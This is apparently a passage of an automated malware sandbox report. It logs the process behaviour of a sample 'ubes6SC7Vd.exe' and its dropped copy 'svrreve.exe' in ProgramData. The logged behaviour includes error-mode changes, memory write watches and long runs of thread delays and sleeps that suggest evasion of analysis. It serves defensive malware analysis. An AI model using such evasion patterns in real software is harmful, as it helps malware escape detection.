                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeMemory allocated: 258F2E10000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeMemory allocated: 258F49B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeMemory allocated: 26DBF3B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeMemory allocated: 26DD8DA0000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeMemory allocated: 26DF1840000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeMemory allocated: 1DD550A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeMemory allocated: 1DD6EA60000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeMemory allocated: 1B08F620000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeMemory allocated: 1B0A7750000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599781Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599672Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599562Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599445Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599342Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599085Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598914Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598809Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598702Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598594Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598469Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598110Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596172Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596054Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595918Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595812Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595704Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595579Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595454Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595329Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595219Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595094Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594061Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 593954Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599437Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599328Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599094Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598984Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598875Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598766Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598656Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598438Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598313Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598188Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598067Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597942Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597789Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597684Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597390Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597281Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597172Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597062Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596953Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596844Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596734Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596625Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596516Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596406Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596297Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596187Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596078Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595969Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595859Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595750Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595641Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595531Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595422Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595313Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595203Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595090Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594977Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594787Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594625Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594511Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594406Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594297Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594187Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594078Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeWindow / User API: threadDelayed 7645Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeWindow / User API: threadDelayed 2186Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeWindow / User API: threadDelayed 7302Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeWindow / User API: threadDelayed 2539Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep count: 33 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -599891s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7412Thread sleep count: 7645 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7412Thread sleep count: 2186 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -599781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -599672s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -599562s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -599445s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -599342s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -599235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -599085s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -598914s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -598809s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -598702s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -598594s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -598469s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -598360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -598235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -598110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -597985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -597860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -597735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -597610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -597485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -597360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -597235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -597110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -596985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -596860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -596735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -596610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -596485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -596360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -596172s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -596054s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -595918s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -595812s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -595704s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -595579s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -595454s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -595329s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -595219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -595094s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -594985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -594860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -594735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -594610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -594485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -594360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -594235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -594061s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -593954s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep count: 32 > 30Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7828Thread sleep count: 7302 > 30Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7828Thread sleep count: 2539 > 30Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599765s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599656s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599547s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599437s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599328s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599219s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599094s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598984s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598875s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598766s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598656s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598547s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598438s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598313s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598188s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598067s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597942s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597789s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597684s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597547s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597390s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597281s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597172s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597062s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596953s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596844s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596734s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596625s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596516s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596406s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596297s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596187s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596078s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595969s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595859s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595750s >= -30000sJump to behavior
